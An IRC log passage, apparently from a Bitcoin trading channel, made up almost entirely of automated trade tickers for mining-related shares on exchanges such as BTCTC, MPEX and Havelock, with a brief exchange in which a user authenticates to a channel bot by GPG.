0.0121 BTC [+] Jul 28 11:30:56 [MPEX] [S.MPOE] 5681 @ 0.0007973 = 4.5295 BTC [-] Jul 28 11:31:00 [BTCTC] [ACTIVEMINING] 10 @ 0.006647 = 0.0665 BTC [+] Jul 28 11:31:51 [BTCTC] [ACTIVEMINING] 111 @ 0.00663 = 0.7359 BTC [-] Jul 28 11:32:22 [BTCTC] [ACTIVEMINING] 25 @ 0.00633 = 0.1583 BTC [-] Jul 28 11:32:24 [BTCTC] [ACTIVEMINING] 50 @ 0.006329 = 0.3165 BTC [-] Jul 28 11:32:56 [BTCTC] [TAT.MINIGAME] 2956 @ 0.000275 = 0.8129 BTC [+] Jul 28 11:33:27 [BTCTC] [ACTIVEMINING] 25 @ 0.006331 = 0.1583 BTC [+] Jul 28 11:33:28 [BTCTC] [ACTIVEMINING] 50 @ 0.00633 = 0.3165 BTC [-] Jul 28 11:33:30 [BTCTC] [ACTIVEMINING] 25 @ 0.006327 = 0.1582 BTC [-] Jul 28 11:35:01 [BTCTC] [TAT.ASICMINER] 6 @ 0.04484 = 0.269 BTC [-] Jul 28 11:35:40 [BTCTC] [TAT.MINIGAME] 2 @ 0.0002799 = 0.0006 BTC [+] Jul 28 11:35:42 [BTCTC] [TAT.MINIGAME] 600 @ 0.0002799 = 0.1679 BTC [+] Jul 28 11:36:48 [BTCTC] [TAT.MINIGAME] 480 @ 0.00028 = 0.1344 BTC [+] Jul 28 11:37:17 [BTCTC] [KENILWORTH] 28 @ 0.001799 = 0.0504 BTC [+] Jul 28 11:37:39 [BTCTC] [TAT.ASICMINER] 6 @ 0.04484 = 0.269 BTC [-] Jul 28 11:37:41 [BTCTC] [TAT.ASICMINER] 14 @ 0.04485 = 0.6279 BTC [+] Jul 28 11:38:38 [BTCTC] [TAT.MINIGAME] 2000 @ 0.00028 = 0.56 BTC [+] Jul 28 11:39:42 [BTCTC] [ACTIVEMINING] 25 @ 0.006531 = 0.1633 BTC [+] Jul 28 11:40:14 [BTCTC] [TAT.MINIGAME] 230 @ 0.00028 = 0.0644 BTC [+] Jul 28 11:40:33 [BTCTC] [ACTIVEMINING] 25 @ 0.006533 = 0.1633 BTC [+] Jul 28 11:42:20 [BTCTC] [ACTIVEMINING] 50 @ 0.006532 = 0.3266 BTC [-] Jul 28 11:42:50 [BTCTC] [TAT.MINIGAME] 2290 @ 0.00028 = 0.6412 BTC [+] Jul 28 11:43:08 [BTCTC] [TAT.ASICMINER] 19 @ 0.04483 = 0.8518 BTC [-] Jul 28 11:43:13 [BTCTC] [TAT.ASICMINER] 6 @ 0.04483 = 0.269 BTC [-] Jul 28 11:43:15 [BTCTC] [TAT.ASICMINER] 26 @ 0.04483 = 1.1656 BTC [-] Jul 28 11:43:19 [BTCTC] [TAT.ASICMINER] 10 @ 0.04482 = 0.4482 BTC [-] Jul 28 11:43:21 [BTCTC] [TAT.ASICMINER] 41 @ 0.0448 = 1.8368 BTC [-] Jul 28 11:43:23 [BTCTC] [TAT.ASICMINER] 4 @ 0.04461 = 0.1784 BTC [-] Jul 28 11:43:25 [HAVELOCK] [AM100] 112 @ 0.0432491 = 4.8439 BTC [-] Jul 28 11:43:27 [BTCTC] [TAT.ASICMINER] 9 @ 0.0446 = 0.4014 BTC [-] Jul 28 11:43:39 [HAVELOCK] [AM100] 3 @ 0.04324929 = 0.1297 BTC [+] Jul 28 11:43:42 [BTCTC] [TAT.MINIGAME] 30 @ 0.0003 = 0.009 BTC [+] Jul 28 11:44:16 [BTCTC] [TAT.MINIGAME] 20 @ 0.0003 = 0.006 BTC [+] Jul 28 11:44:28 [BTCTC] [TAT.MINIGAME] 1710 @ 0.00028 = 0.4788 BTC [-] Jul 28 11:44:30 [BTCTC] [TAT.MINIGAME] 98 @ 0.0002799 = 0.0274 BTC [-] Jul 28 11:44:32 [BTCTC] [TAT.MINIGAME] 1044 @ 0.000275 = 0.2871 BTC [-] Jul 28 11:44:45 [MPEX] [S.MG] 15899 @ 0.00025 = 3.9748 BTC [+] Jul 28 11:44:57 [BTCTC] [COGNITIVE] 2 @ 0.5801 = 1.1602 BTC [-] Jul 28 11:46:45 [BTCTC] [ACTIVEMINING] 25 @ 0.006637 = 0.1659 BTC [+] Jul 28 11:47:59 [BTCTC] [ACTIVEMINING] 25 @ 0.006637 = 0.1659 BTC [+] Jul 28 11:51:00 [BTCTC] [TAT.MINIGAME] 7422 @ 0.0002602 = 1.9312 BTC [-] Jul 28 11:53:47 [BTCTC] [TAT.MINIGAME] 10000 @ 0.000268 = 2.68 BTC [+] Jul 28 11:55:42 [BTCTC] [TAT.MINIGAME] 5000 @ 0.000269 = 1.345 BTC [+] Jul 28 11:55:44 [BTCTC] [TAT.MINIGAME] 1000 @ 0.000279 = 0.279 BTC [+] Jul 28 11:55:46 [BTCTC] [TAT.MINIGAME] 1000 @ 0.000289 = 0.289 BTC [+] Jul 28 11:56:31 [BTCTC] [TAT.MINIGAME] 50 @ 0.0003 = 0.015 BTC [+] Jul 28 11:58:18 [BTCTC] [TAT.MINIGAME] 1000 @ 0.000279 = 0.279 BTC [-] Jul 28 11:58:30 [MPEX] [S.MG] 11460 @ 0.00026 = 2.9796 BTC [+] Jul 28 11:58:56 [BTCTC] [TAT.MINIGAME] 25 @ 0.000279 = 0.007 BTC [-] Jul 28 11:59:08 [BTCTC] [ACTIVEMINING] 1 @ 0.006647 BTC [+] Jul 28 11:59:31 [BTCTC] [TAT.MINIGAME] 20 @ 0.000279 = 0.0056 BTC [-] Jul 28 11:59:51 [BTCTC] [TAT.MINIGAME] 1400 @ 0.000279 = 0.3906 BTC [-] Jul 28 12:00:35 [BTCTC] [TAT.MINIGAME] 100 @ 0.000279 = 0.0279 BTC [-] Jul 28 12:01:08 [BTCTC] [TAT.MINIGAME] 10672 @ 0.0002602 = 2.7769 BTC [-] Jul 28 12:01:25 [MPEX] [S.MG] 1182 @ 0.00026 = 0.3073 BTC [+] Jul 28 12:01:29 [BTCTC] [TAT.MINIGAME] 2455 @ 0.000279 = 0.6849 BTC [+] Jul 28 12:02:07 [BTCTC] [ACTIVEMINING] 25 @ 0.006537 = 0.1634 BTC [-] Jul 28 12:02:09 [BTCTC] [ACTIVEMINING] 6 @ 0.006536 = 0.0392 BTC [-] Jul 28 12:04:06 [BTCTC] [TAT.MINIGAME] 500 @ 0.0002849 = 0.1425 BTC [+] Jul 28 12:05:35 [BTCTC] [TAT.MINIGAME] 10000 @ 0.0002848 = 2.848 BTC [-] Jul 28 12:06:36 [BTCTC] [ACTIVEMINING] 25 @ 0.006642 = 0.1661 BTC [+] Jul 28 12:06:38 [BTCTC] [ACTIVEMINING] 23 @ 0.006643 = 0.1528 BTC [+] Jul 28 12:06:38 [BTCTC] [ACTIVEMINING] 26 @ 0.006643 = 0.1727 BTC [+] Jul 28 12:08:04 [BTCTC] [TAT.MINIGAME] 5000 @ 0.0002825 = 1.4125 BTC [-] Jul 28 12:08:30 [BTCTC] [TAT.MINIGAME] 5000 @ 0.0002825 = 1.4125 BTC [-] Jul 28 12:09:03 [BTCTC] [ACTIVEMINING] 25 @ 0.00664 = 0.166 BTC [-] Jul 28 12:09:05 [BTCTC] [ACTIVEMINING] 62 @ 0.006641 = 0.4117 BTC [+] Jul 28 12:09:07 [BTCTC] [ACTIVEMINING] 24 @ 0.006643 = 0.1594 BTC [+] Jul 28 12:09:08 [BTCTC] [ACTIVEMINING] 13 @ 0.006644 = 0.0864 BTC [+] Jul 28 12:09:23 [BTCTC] [TAT.MINIGAME] 711 @ 0.0002825 = 0.2009 BTC [-] Jul 28 12:09:32 [BTCTC] [TAT.MINIGAME] 500 @ 0.0002825 = 0.1413 BTC [-] Jul 28 12:12:19 [BTCTC] [TAT.MINIGAME] 50 @ 0.0002824 = 0.0141 BTC [-] Jul 28 12:12:32 [BTCTC] [TAT.MINIGAME] 1500 @ 0.0002824 = 0.4236 BTC [-] Jul 28 12:12:49 [BTCTC] [BASIC-MINING] 1 @ 0.5492 BTC [-] Jul 28 12:13:01 [MPEX] [S.MG] 12358 @ 0.00026 = 3.2131 BTC [+] Jul 28 12:13:41 [BTCTC] [TAT.MINIGAME] 200 @ 0.0002824 = 0.0565 BTC [-] Jul 28 12:14:05 [BTCTC] [TAT.MINIGAME] 134 @ 0.0002824 = 0.0378 BTC [-] Jul 28 12:15:09 [BTCTC] [ACTIVEMINING] 25 @ 0.006544 = 0.1636 BTC [-] Jul 28 12:15:23 [BTCTC] [ACTIVEMINING] 12 @ 0.006543 = 0.0785 BTC [-] Jul 28 12:15:34 [BTCTC] [TAT.MINIGAME] 800 @ 0.000278 = 0.2224 BTC [-] Jul 28 12:17:30 [BTCTC] [TAT.MINIGAME] 100 @ 0.000278 = 0.0278 BTC [-] Jul 28 12:19:03 [BTCTC] [ACTIVEMINING] 8 @ 0.006639 = 0.0531 BTC [+] Jul 28 12:19:26 [BTCTC] [TAT.MINIGAME] 1000 @ 0.000278 = 0.278 BTC [-] Jul 28 12:19:29 [BTCTC] [TAT.MINIGAME] 1100 @ 0.000278 = 0.3058 BTC [-] Jul 28 12:19:49 [BTCTC] [TAT.MINIGAME] 250 @ 0.000278 = 0.0695 BTC [-] Jul 28 12:20:18 [BTCTC] [TAT.MINIGAME] 33 @ 0.000278 = 0.0092 BTC [-] Jul 28 12:21:34 [BTCTC] [TAT.MINIGAME] 1000 @ 0.000278 = 0.278 BTC [-] Jul 28 12:21:59 [MPEX] [S.MPOE] 8300 @ 0.0007998 = 6.6383 BTC [+] Jul 28 12:22:01 [MPEX] [S.MPOE] 1800 @ 0.00080196 = 1.4435 BTC [+] Jul 28 12:24:38 [BTCTC] [TAT.MINIGAME] 100 @ 0.000278 = 0.0278 BTC [-] Jul 28 12:25:11 [BTCTC] [KENILWORTH] 34 @ 0.001799 = 0.0612 BTC [+] Jul 28 12:25:56 [BTCTC] [TAT.MINIGAME] 617 @ 0.000278 = 0.1715 BTC [-] Jul 28 12:26:38 [BTCTC] [TAT.MINIGAME] 7500 @ 0.000279 = 2.0925 BTC [+] Jul 28 12:27:30 [BTCTC] [TAT.MINIGAME] 15000 @ 0.000278 = 4.17 BTC [-] Jul 28 12:29:03 [MPEX] [S.MG] 6720 @ 0.000267 = 1.7942 BTC [+] Jul 28 12:31:18 [BTCTC] [ACTIVEMINING] 25 @ 0.006511 = 0.1628 BTC [-] Jul 28 12:31:19 [BTCTC] [TAT.MINIGAME] 500 @ 0.0002824 = 0.1412 BTC [+] Jul 28 12:32:03 [BTCTC] [TAT.MINIGAME] 11500 @ 0.0002824 = 3.2476 BTC [+] Jul 28 12:32:04 [BTCTC] [ACTIVEMINING] 25 @ 0.006511 = 0.1628 BTC [-] Jul 28 12:32:08 [BTCTC] [ACTIVEMINING] 25 @ 0.006595 = 0.1649 BTC [+] Jul 28 12:32:20 [BTCTC] [TAT.ASICMINER] 12 @ 0.04451 = 0.5341 BTC [-] Jul 28 12:32:23 [BTCTC] [TAT.ASICMINER] 25 @ 0.0445 = 1.1125 BTC [-] Jul 28 12:32:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.04441 BTC [-] Jul 28 12:32:28 [BTCTC] [TAT.ASICMINER] 2 @ 0.0444 = 0.0888 BTC [-] Jul 28 12:32:30 [BTCTC] [TAT.ASICMINER] 26 @ 0.04412 = 1.1471 BTC [-] Jul 28 12:32:34 [BTCTC] [TAT.ASICMINER] 30 @ 0.04411 = 1.3233 BTC [-] Jul 28 12:32:38 [BTCTC] [TAT.ASICMINER] 40 @ 0.0441 = 1.764 BTC [-] Jul 28 12:32:40 [BTCTC] [TAT.ASICMINER] 33 @ 0.0441 = 1.4553 BTC [-] Jul 28 12:32:43 [BTCTC] [TAT.ASICMINER] 4 @ 0.0441 = 0.1764 BTC [-] Jul 28 12:32:59 [BTCTC] [ACTIVEMINING] 25 @ 0.006511 = 0.1628 BTC [-] Jul 28 12:33:00 [BTCTC] [TAT.MINIGAME] 6289 @ 0.0002825 = 1.7766 BTC [+] Jul 28 12:33:41 [BTCTC] [ACTIVEMINING] 14 @ 0.006512 = 0.0912 BTC [+] Jul 28 12:35:54 [BTCTC] [TAT.MINIGAME] 25 @ 0.0002849 = 0.0071 BTC [+] Jul 28 12:35:57 [BTCTC] [TAT.MINIGAME] 475 @ 0.0002849 = 0.1353 BTC [+] Jul 28 12:36:42 [BTCTC] [TAT.MINIGAME] 50 @ 0.0002874 = 0.0144 BTC [+] Jul 28 12:37:07 [BTCTC] [TAT.MINIGAME] 2272 @ 0.0002874 = 0.653 BTC [+] Jul 28 12:37:34 [BTCTC] [TAT.MINIGAME] 100 @ 0.0002874 = 0.0287 BTC [+] Jul 28 12:39:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.04401 BTC [-] Jul 28 12:39:27 [BTCTC] [TAT.MINIGAME] 5000 @ 0.0002875 = 1.4375 BTC [+] Jul 28 12:39:44 [BTCTC] [TAT.MINIGAME] 2500 @ 0.0002875 = 0.7188 BTC [+] Jul 28 12:39:52 [BTCTC] [TAT.MINIGAME] 300 @ 0.0002873 = 0.0862 BTC [-] Jul 28 12:40:47 [BTCTC] [TAT.MINIGAME] 1000 @ 0.000289 = 0.289 BTC [+] Jul 28 12:41:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.04401 BTC [-] Jul 28 12:41:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.044 BTC [-] Jul 28 12:41:50 [BTCTC] [TAT.ASICMINER] 2 @ 0.044 = 0.088 BTC [-] Jul 28 12:41:52 [BTCTC] [TAT.ASICMINER] 4 @ 0.04347 = 0.1739 BTC [-] Jul 28 12:41:55 [BTCTC] [TAT.ASICMINER] 6 @ 0.04346 = 0.2608 BTC [-] Jul 28 12:41:57 [BTCTC] [TAT.ASICMINER] 2 @ 0.04346 = 0.0869 BTC [-] Jul 28 12:41:59 [BTCTC] [TAT.ASICMINER] 3 @ 0.04321 = 0.1296 BTC [-] Jul 28 12:42:00 [BTCTC] [TAT.ASICMINER] 7 @ 0.0432 = 0.3024 BTC [-] Jul 28 12:42:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.04301 BTC [-] Jul 28 12:42:04 [BTCTC] [TAT.ASICMINER] 2 @ 0.043 = 0.086 BTC [-] Jul 28 12:42:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.04261 BTC [-] Jul 28 12:42:08 [BTCTC] [TAT.ASICMINER] 2 @ 0.0426 = 0.0852 BTC [-] Jul 28 12:42:36 [BTCTC] [TAT.MINIGAME] 10 @ 0.0003025 = 0.003 BTC [+] Jul 28 12:42:38 [BTCTC] [TAT.MINIGAME] 90 @ 0.0003025 = 0.0272 BTC [+] Jul 28 12:43:02 [MPEX] [S.MG] 10000 @ 0.0002675 = 2.675 BTC [+] Jul 28 12:43:42 [BTCTC] [ACTIVEMINING] 25 @ 0.006587 = 0.1647 BTC [+] Jul 28 12:43:46 [BTCTC] [ACTIVEMINING] 13 @ 0.006588 = 0.0856 BTC [+] Jul 28 12:44:15 [BTCTC] [TAT.MINIGAME] 100 @ 0.000305 = 0.0305 BTC [+] Jul 28 12:44:46 [BTCTC] [TAT.MINIGAME] 333 @ 0.0003589 = 0.1195 BTC [+] Jul 28 12:45:32 [BTCTC] [TAT.MINIGAME] 2446 @ 0.000306 = 0.7485 BTC [-] Jul 28 12:45:38 [BTCTC] [TAT.MINIGAME] 100 @ 0.000305 = 0.0305 BTC [-] Jul 28 12:45:40 [BTCTC] [TAT.MINIGAME] 100 @ 0.0003025 = 0.0303 BTC [-] Jul 28 12:45:44 [BTCTC] [TAT.MINIGAME] 125 @ 0.000295 = 0.0369 BTC [-] Jul 28 12:46:35 [BTCTC] [TAT.MINIGAME] 300 @ 0.000295 = 0.0885 BTC [-] Jul 28 12:46:36 [BTCTC] [ACTIVEMINING] 25 @ 0.006585 = 0.1646 BTC [-] Jul 28 12:46:38 [BTCTC] [ACTIVEMINING] 12 @ 0.006586 = 0.079 BTC [+] Jul 28 12:46:40 [BTCTC] [ACTIVEMINING] 25 @ 0.006599 = 0.165 BTC [+] Jul 28 12:46:41 [BTCTC] [ACTIVEMINING] 50 @ 0.0066 = 0.33 BTC [+] Jul 28 12:48:29 [BTCTC] [TAT.MINIGAME] 211 @ 0.000288 = 0.0608 BTC [-] Jul 28 12:49:33 [BTCTC] [TAT.MINIGAME] 2235 @ 0.000287 = 0.6414 BTC [-] Jul 28 12:49:34 [BTCTC] [TAT.MINIGAME] 765 @ 0.0002879 = 0.2202 BTC [+] Jul 28 12:49:50 [BTCTC] [TAT.ASICMINER] 20 @ 0.04301 = 0.8602 BTC [+] Jul 28 12:49:52 [BTCTC] [TAT.ASICMINER] 16 @ 0.043 = 0.688 BTC [-] Jul 28 12:51:19 [BTCTC] [TAT.MINIGAME] 4000 @ 0.0002889 = 1.1556 BTC [+] Jul 28 12:55:55 [BTCTC] [TAT.MINIGAME] 100 @ 0.0002889 = 0.0289 BTC [+] Jul 28 12:56:44 [BTCTC] [TAT.MINIGAME] 300 @ 0.0002889 = 0.0867 BTC [+] Jul 28 12:56:56 [BTCTC] [ACTIVEMINING] 25 @ 0.006642 = 0.1661 BTC [+] Jul 28 12:56:57 [BTCTC] [ACTIVEMINING] 21 @ 0.006643 = 0.1395 BTC [+] Jul 28 12:57:52 [BTCTC] [ACTIVEMINING] 62 @ 0.006644 = 0.4119 BTC [+] Jul 28 12:57:54 [BTCTC] [ACTIVEMINING] 64 @ 0.006648 = 0.4255 BTC [+] Jul 28 12:57:54 [BTCTC] [ACTIVEMINING] 73 @ 0.006663 = 0.4864 BTC [+] Jul 28 12:57:56 [BTCTC] [ACTIVEMINING] 100 @ 0.006664 = 0.6664 BTC [+] Jul 28 12:57:57 [BTCTC] [ACTIVEMINING] 66 @ 0.006666 = 0.44 BTC [+] Jul 28 12:57:58 [BTCTC] [ACTIVEMINING] 75 @ 0.006666 = 0.5 BTC [+] Jul 28 12:58:27 [BTCTC] [ACTIVEMINING] 201 @ 0.006669 = 1.3405 BTC [+] Jul 28 12:58:29 [BTCTC] [ACTIVEMINING] 125 @ 0.006799 = 0.8499 BTC [+] Jul 28 12:58:30 [BTCTC] [ACTIVEMINING] 500 @ 0.0068 = 3.4 BTC [+] Jul 28 12:59:53 [BTCTC] [ACTIVEMINING] 25 @ 0.006893 = 0.1723 BTC [+] Jul 28 12:59:54 [BTCTC] [ACTIVEMINING] 41 @ 0.006894 = 0.2827 BTC [+] Jul 28 12:59:56 [BTCTC] [ACTIVEMINING] 75 @ 0.006895 = 0.5171 BTC [+] Jul 28 12:59:57 [BTCTC] [ACTIVEMINING] 497 @ 0.006896 = 3.4273 BTC [+] Jul 28 12:59:58 [BTCTC] [ACTIVEMINING] 100 @ 0.006897 = 0.6897 BTC [+] Jul 28 12:59:59 [BTCTC] [ACTIVEMINING] 100 @ 0.006898 = 0.6898 BTC [+] Jul 28 13:00:00 [BTCTC] [ACTIVEMINING] 75 @ 0.006899 = 0.5174 BTC [+] Jul 28 13:00:02 [BTCTC] [ACTIVEMINING] 100 @ 0.006899 = 0.6899 BTC [+] Jul 28 13:01:27 [BTCTC] [TAT.MINIGAME] 2600 @ 0.0002889 = 0.7511 BTC [+] Jul 28 13:01:29 [BTCTC] [TAT.MINIGAME] 100 @ 0.000289 = 0.0289 BTC [+] Jul 28 13:03:02 [BTCTC] [ACTIVEMINING] 600 @ 0.00689 = 4.134 BTC [-] Jul 28 13:03:04 [BTCTC] [ACTIVEMINING] 2742 @ 0.0069 = 18.9198 BTC [+] Jul 28 13:04:34 [BTCTC] [ACTIVEMINING] 3 @ 0.006943 = 0.0208 BTC [+] Jul 28 13:04:59 [BTCTC] [ACTIVEMINING] 1 @ 0.006943 BTC [+] Jul 28 13:05:18 [BTCTC] [ACTIVEMINING] 46 @ 0.006943 = 0.3194 BTC [+] Jul 28 13:05:43 [BTCTC] [ACTIVEMINING] 3 @ 0.006944 = 0.0208 BTC [+] Jul 28 13:05:45 [BTCTC] [ACTIVEMINING] 75 @ 0.00699 = 0.5243 BTC [+] Jul 28 13:05:46 [BTCTC] [ACTIVEMINING] 22 @ 0.00699 = 0.1538 BTC [+] Jul 28 13:08:22 [BTCTC] [ACTIVEMINING] 400 @ 0.006998 = 2.7992 BTC [+] Jul 28 13:11:10 [BTCTC] [TAT.MINIGAME] 978 @ 0.000292 = 0.2856 BTC [+] Jul 28 13:11:12 [BTCTC] [TAT.MINIGAME] 5000 @ 0.000294 = 1.47 BTC [+] Jul 28 13:11:14 [BTCTC] [TAT.MINIGAME] 1022 @ 0.000295 = 0.3015 BTC [+] Jul 28 13:12:21 [BTCTC] [ACTIVEMINING] 10 @ 0.006997 = 0.07 BTC [-] Jul 28 13:12:30 [BTCTC] [ACTIVEMINING] 40 @ 0.006997 = 0.2799 BTC [-] Jul 28 13:12:32 [BTCTC] [ACTIVEMINING] 16 @ 0.006998 = 0.112 BTC [+] Jul 28 13:12:34 [BTCTC] [ACTIVEMINING] 50 @ 0.006998 = 0.3499 BTC [+] Jul 28 13:12:34 [BTCTC] [ACTIVEMINING] 100 @ 0.006998 = 0.6998 BTC [+] Jul 28 13:12:36 [BTCTC] [ACTIVEMINING] 247 @ 0.006999 = 1.7288 BTC [+] Jul 28 13:13:18 [BTCTC] [ACTIVEMINING] 354 @ 0.006999 = 2.4776 BTC [+] Jul 28 13:16:41 [BTCTC] [TAT.VIRTUALMINE] 18 @ 0.003301 = 0.0594 BTC [-] Jul 28 13:17:29 [BTCTC] [TAT.MINIGAME] 907 @ 0.000295 = 0.2676 BTC [+] Jul 28 13:17:44 [BTCTC] [KENILWORTH] 10 @ 0.001799 = 0.018 BTC [+] Jul 28 13:18:41 [BTCTC] [TAT.ASICMINER] 2 @ 0.04496 = 0.0899 BTC [+] Jul 28 13:19:28 [HAVELOCK] [AM100] 22 @ 0.04280002 = 0.9416 BTC [-] Jul 28 13:21:01 [BTCTC] [ACTIVEMINING] 1 @ 0.006998 BTC [-] Jul 28 13:21:05 [HAVELOCK] [HIM] 2 @ 0.22 = 0.44 BTC [-] Jul 28 13:21:38 ;;ident jurov Jul 28 13:21:39 Nick 'jurov', with hostmask 'jurov!~jurov@mx.coinbr.com', is not identified. Jul 28 13:22:08 [BTCTC] [ACTIVEMINING] 10 @ 0.006998 = 0.07 BTC [-] Jul 28 13:22:27 okay Jul 28 13:22:34 ;;gpg,eauth jurov Jul 28 13:22:35 Error: "gpg,eauth" is not a valid command. Jul 28 13:22:38 ;;gpg,auth jurov Jul 28 13:22:39 Error: "gpg,auth" is not a valid command. Jul 28 13:23:03 ;;seen #bitcoin-otc mycock Jul 28 13:23:03 mycock was last seen in #bitcoin-otc 1 day, 10 hours, 2 minutes, and 22 seconds ago: http://imgur.com/nBoVvTw.jpg Jul 28 13:23:38 [BTCTC] [TAT.MINIGAME] 1 @ 0.0003249 BTC [+] Jul 28 13:23:45 ;;gpg eauth jurov Jul 28 13:23:45 Request successful for user jurov, hostmask jurov!~jurov@mx.coinbr.com. Get your encrypted OTP from http://bitcoin-otc.com/otps/677ABD62D0AEE7D7 Jul 28 13:24:32 ;;gpg everify freenode:#bitcoin-otc:5dca8665ee3adf4196ab9fd7b209815a24a27a983f643cb8273dacce Jul 28 13:24:33 You are now authenticated for user jurov with key 677ABD62D0AEE7D7 Jul 28 13:24:38 [BTCTC] [ACTIVEMINING] 25 @ 0.006809 = 0.1702 BTC [-] Jul 28 13:25:31 [BTCTC] [ACTIVEMINING] 25 @ 0.006997 = 0.1749 BTC [+] Jul 28 13:30:06 [HAVELOCK] [AM100] 32 @ 0.0432399 = 1.3837 BTC [+] Jul 28 13:30:24 [HAVELOCK] [AM100] 54 @ 0.04324 = 2.335 BTC [+] Jul 28 13:31:16 [HAVELOCK] [AM100] 5 @ 0.04324987 = 0.2162 BTC [+] Jul 28 13:32:46 [HAVELOCK] [HIM] 1 @ 0.201 BTC [-] Jul 28 13:33:12 [BTCTC] [ACTIVEMINING] 1 @ 0.006998 BTC [+] Jul 28 13:35:40 [BTCTC] [ACTIVEMINING] 25 @ 0.006851 = 0.1713 BTC [-] Jul 28 13:36:26 [BTCTC] [ACTIVEMINING] 25 @ 0.006851 = 0.1713 BTC [-] Jul 28 13:36:28 [BTCTC] [ACTIVEMINING] 275 @ 0.00685 = 1.8838 BTC [-] Jul 28 13:36:32 [BTCTC] [ACTIVEMINING] 1 @ 0.006998 BTC [+] Jul 28 13:38:25 [HAVELOCK] [SMG] 6 @ 0.0002699 = 0.0016 BTC [-] Jul 28 13:38:29 [BTCTC] [ACTIVEMINING] 25 @ 0.006855 = 0.1714 BTC [-] Jul 28 13:38:30 [BTCTC] [ACTIVEMINING] 48 @ 0.006854 = 0.329 BTC [-] Jul 28 13:38:38 [BTCTC] [TAT.ASICMINER] 35 @ 0.04498 = 1.5743 BTC [+] Jul 28 13:38:44 [BTCTC] [ACTIVEMINING] 1 @ 0.0055 BTC [-] Jul 28 13:41:15 [BTCTC] [ACTIVEMINING] 6 @ 0.006998 = 0.042 BTC [+] Jul 28 13:42:50 [BTCTC] [ASICMINER-PT] 1 @ 4.513 BTC [-] Jul 28 13:43:33 [BTCTC] [ACTIVEMINING] 25 @ 0.006998 = 0.175 BTC [+] Jul 28 13:43:52 [BTCTC] [ACTIVEMINING] 25 @ 0.006998 = 0.175 BTC [+] Jul 28 13:43:54 [BTCTC] [ACTIVEMINING] 575 @ 0.006999 = 4.0244 BTC [+] Jul 28 13:44:41 [BTCTC] [ACTIVEMINING] 15 @ 0.006998 = 0.105 BTC [-] Jul 28 13:45:19 [BTCTC] [ACTIVEMINING] 2 @ 0.006999 = 0.014 BTC [+] Jul 28 13:45:25 [BTCTC] [ACTIVEMINING] 5 @ 0.006905 = 0.0345 BTC [-] Jul 28 13:46:25 [BTCTC] [ASICMINER-PT] 1 @ 4.513 BTC [-] Jul 28 13:47:18 [BTCTC] [ACTIVEMINING] 640 @ 0.006999 = 4.4794 BTC [+] Jul 28 13:47:34 [BTCTC] [ACTIVEMINING] 1 @ 0.006999 BTC [+] Jul 28 13:55:25 [BTCTC] [TAT.MINIGAME] 2500 @ 0.000271 = 0.6775 BTC [-] Jul 28 13:56:27 [BTCTC] [TAT.MINIGAME] 261 @ 0.000271 = 0.0707 BTC [-] Jul 28 13:56:29 [BTCTC] [TAT.MINIGAME] 525 @ 0.00027 = 0.1418 BTC [-] Jul 28 13:56:31 [BTCTC] [TAT.MINIGAME] 1714 @ 0.00027 = 0.4628 BTC [-] Jul 28 14:01:24 [BTCTC] [ACTIVEMINING] 1 @ 0.006999 BTC [+] Jul 28 14:01:51 [BTCTC] [KENILWORTH] 10 @ 0.0017 = 0.017 BTC [-] Jul 28 14:02:12 [HAVELOCK] [AM100] 3 @ 0.04280002 = 0.1284 BTC [-] Jul 28 14:07:36 [BTCTC] [TAT.MINIGAME] 1 @ 0.000271 BTC [+] Jul 28 14:07:38 [BTCTC] [TAT.MINIGAME] 4999 @ 0.00027 = 1.3497 BTC [-] Jul 28 14:08:32 [BTCTC] [ACTIVEMINING] 179 @ 0.006999 = 1.2528 BTC [+] Jul 28 14:08:34 [BTCTC] [ACTIVEMINING] 100 @ 0.006999 = 0.6999 BTC [+] Jul 28 14:08:35 [BTCTC] [ACTIVEMINING] 1 @ 0.007 BTC [+] Jul 28 14:10:47 [BTCTC] [ACTIVEMINING] 12 @ 0.006916 = 0.083 BTC [-] Jul 28 14:10:48 [BTCTC] [ACTIVEMINING] 462 @ 0.006851 = 3.1652 BTC [-] Jul 28 14:10:50 [BTCTC] [ACTIVEMINING] 925 @ 0.006825 = 6.3131 BTC [-] Jul 28 14:10:51 [BTCTC] [ACTIVEMINING] 90 @ 0.006801 = 0.6121 BTC [-] Jul 28 14:19:40 [MPEX] [S.MPOE] 5400 @ 0.00080196 = 4.3306 BTC [+] Jul 28 14:23:12 [BTCTC] [COGNITIVE] 1 @ 0.58 BTC [-] Jul 28 14:23:14 [BTCTC] [COGNITIVE] 1 @ 0.58 BTC [-] Jul 28 14:23:16 [BTCTC] [COGNITIVE] 13 @ 0.5741 = 7.4633 BTC [-] Jul 28 14:23:17 [BTCTC] [COGNITIVE] 1 @ 0.574 BTC [-] Jul 28 14:23:20 [BTCTC] [COGNITIVE] 5 @ 0.572 = 2.86 BTC [-] Jul 28 14:23:22 [BTCTC] [COGNITIVE] 2 @ 0.57 = 1.14 BTC [-] Jul 28 14:23:24 [BTCTC] [COGNITIVE] 1 @ 0.54 BTC [-] Jul 28 14:23:26 [BTCTC] [COGNITIVE] 5 @ 0.53 = 2.65 BTC [-] Jul 28 14:23:26 [BTCTC] [COGNITIVE] 2 @ 0.524 = 1.048 BTC [-] Jul 28 14:23:28 [BTCTC] [COGNITIVE] 10 @ 0.5225 = 5.225 BTC [-] Jul 28 14:23:29 [BTCTC] [COGNITIVE] 3 @ 0.522 = 1.566 BTC [-] Jul 28 14:23:31 [BTCTC] [COGNITIVE] 1 @ 0.51 BTC [-] Jul 28 14:23:33 [BTCTC] [COGNITIVE] 1 @ 0.5094 BTC [-] Jul 28 14:23:35 [BTCTC] [COGNITIVE] 3 @ 0.503 = 1.509 BTC [-] Jul 28 14:24:02 [MPEX] [S.MPOE] 1950 @ 0.00080196 = 1.5638 BTC [+] Jul 28 14:24:21 [MPEX] [S.MPOE] 4750 @ 0.00080244 = 3.8116 BTC [+] Jul 28 14:24:23 [MPEX] [S.MPOE] 13400 @ 0.00080362 = 10.7685 BTC [+] Jul 28 14:24:48 [MPEX] [S.MPOE] 3251 @ 0.00080384 = 2.6133 BTC [+] Jul 28 14:27:20 [BTCTC] [COGNITIVE] 5 @ 0.5031 = 2.5155 BTC [+] Jul 28 14:27:21 [BTCTC] [COGNITIVE] 1 @ 0.503 BTC [-] Jul 28 14:27:23 [BTCTC] 